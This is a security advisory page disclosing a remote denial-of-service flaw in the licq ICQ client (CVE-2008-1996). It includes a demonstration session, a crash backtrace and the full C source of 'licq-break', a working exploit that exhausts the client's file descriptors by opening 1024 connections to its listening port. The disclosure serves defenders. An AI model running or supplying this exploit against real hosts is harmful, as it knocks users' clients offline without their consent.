SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

licq remote DoS


Arrow  SecurityAlert : 3851
Arrow  CVE : CVE-2008-1996
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Milen Rangelov
Arrow  Published : 03.05.2008

Arrow  Affected Software : licq



Arrow  Advisory Content :  

Hello,

Licq is a linux qt-based ICQ client. There is a vulnerability in the way
licq processes new incoming TCP connections which can be exploited by a
remote attacker to crash the client.

When executed, licq opens a listening socket at a random port (AFAIK
between 30000 and 65000). There is no host-based authentication and any
remote host can connect to it. Those connections are not closed by licq
after a given timeout period.

When all possible open file descriptors are exhausted (they are limited
to 1024 for non-root users in most linux installations /ulimit -n/), a
new incoming TCP connection causes licq to crash.

Here is some example:

We run licq:
gat3way@gat3way:~$ licq

from another console, we find out the port licq is listening to (we'd
need to portscan if the target is on a remote system):

gat3way@gat3way:/tmp$ lsof |grep licq|grep LISTEN
licq 10783 gat3way 9u IPv4 35993218 TCP
*:52259 (LISTEN)

Now we run our "evil" denial of service code:
gat3way@gat3way:/tmp$ ./licq-break 127.0.0.1 52259
ip=127.0.0.1
done!

and go back to the console on which we ran licq...oops..

Licq Segmentation Violation Detected.
Backtrace (saved in /home/gat3way/.licq//licq.backtrace):
licq(licq_handle_sigabrt+0x2b4) [0x80f68d4]
[0xffffe420]
/lib/libc.so.6(abort+0x101) [0xb7b17811]
licq [0x80f6b1d]
[0xffffe420]
licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a]
/lib/libpthread.so.0 [0xb7d9e383]
/lib/libc.so.6(clone+0x5e) [0xb7bc173e]
Attempting to generate core file.
....

The source of licq-break (nothing particular, just connects MAX sockets
to a certain port at the victim's host):
-------------------------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// change to suit your needs
#define MAX 1024

int fds[MAX];

int main(int argc, char *argv[])
{
int port,a;
char host[12];
struct sockaddr_in victim;
struct in_addr inp;

if (argc!=3)
{
printf("usage: %s <ip> <port>n",argv[0]);
exit(1);
}

port=atoi(argv[2]);
strcpy(host,argv[1]);
printf("ip=%sn",host);

for (a=1;a<=MAX;a++)
{
fds[a]=socket(PF_INET,SOCK_STREAM,0);
victim.sin_family= AF_INET;
victim.sin_port=htons(port);
inet_aton(host,&victim.sin_addr);
connect(fds[a],&victim,sizeof(victim));
}

printf("done!");

}






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

» PHP 5.3.0 5.2.11
   posix_mkfifo()
   open_basedir bypass

Copyright © SecurityReason.com. All Rights Reserved.